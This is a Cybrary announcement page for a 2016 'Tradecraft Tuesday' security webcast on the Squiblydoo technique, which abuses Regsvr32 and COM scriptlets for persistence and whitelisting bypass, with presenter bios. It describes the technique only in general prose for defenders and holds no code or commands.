Tradecraft Tuesday – COM Scriptlets & the Squiblydoo Attack

Begin Learning Cyber Security for FREE Now!

Already a Member Login Here

Tradecraft Tuesday – COM Scriptlets & the Squiblydoo Attack

Author: kylehanslovan | Published on May 3, 2016 | Views: 2604

Tradecraft Tuesday

What is Tradecraft Tuesday?

Every Tuesday at 12pm ET, Chris Bisnett and Kyle Hanslovan expose the techniques used by hackers. With their 20 combined years in offensive cyber security and digital forensics, Chris and Kyle cover a new topic each week in a LIVE video chat. These unrehearsed conversations allow anyone to join in, ask questions, and share their experiences from offensive and defensive perspectives. In case you miss an episode, each recorded session will be uploaded to Cybrary’s new CH4NN3L platform.

Squiblydoo Logo

On this week’s episode, we’re diving into how hackers can use COM Scriplets and Regsvr32.exe for fileless persistence, bypassing application whitelisting, and evading detection by endpoint security products. This tradecraft has been coined the “Squiblydoo” attack by Casey Smith @subTee who originally exposed the technique in early April. In a nutshell, Casey illustrated how Windows can natively run JScript/VBScript embedded into an XML file called a scriptlet with the help of Microsoft’s Regsvr32.exe application and the underlying COM Subsystem. Furthermore, he shared how this scriptlet can be remotely fetched from a URL, leaving only a footprint in memory. With this tradecraft, hackers are able to ensure malicious code is automatically executed after a reboot – bypassing application whitelisting and antivirus products along the way. Join us to learn how it happens and what can be done to mitigate this nasty threat!

TradecraftTuesday Badge

Check out your profile to see your new badge 🙂

TradecraftTuesday_ChrisChris Bisnett
Chris Bisnett is a veteran information security researcher with more than a decade of experience in offensive and defensive cyber operations. While serving with the NSA RedTeam, he attacked government networks and systems to identify and remedy vulnerabilities. He is also a recognized Black Hat conference trainer and has taught his “Fuzzing For Vulnerabilities” course at several events around the world. Prior to founding Huntress Labs, Mr. Bisnett co-founded LegalConfirm, LLC where he led product design and development until the company was acquired in 2014.

TradecraftTuesday_KyleKyle Hanslovan
For the past 10 years, Kyle Hanslovan has supported defensive and offensive cyber operations in the U.S. Intelligence Community and currently is the CEO of Huntress Labs. He previously co-founded the defense consulting firm StrategicIO and actively participates in the ethical hacking community as a Black Hat conference trainer, STEM mentor, and Def Con CTF champion. Additionally, he serves in the Maryland Air National Guard as a Cyber Warfare Operator. With his strong background in technical leadership, software development, and malware analysis, Mr. Hanslovan seeks to significantly raise the bar for malicious actors to successfully conduct cyber attacks.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?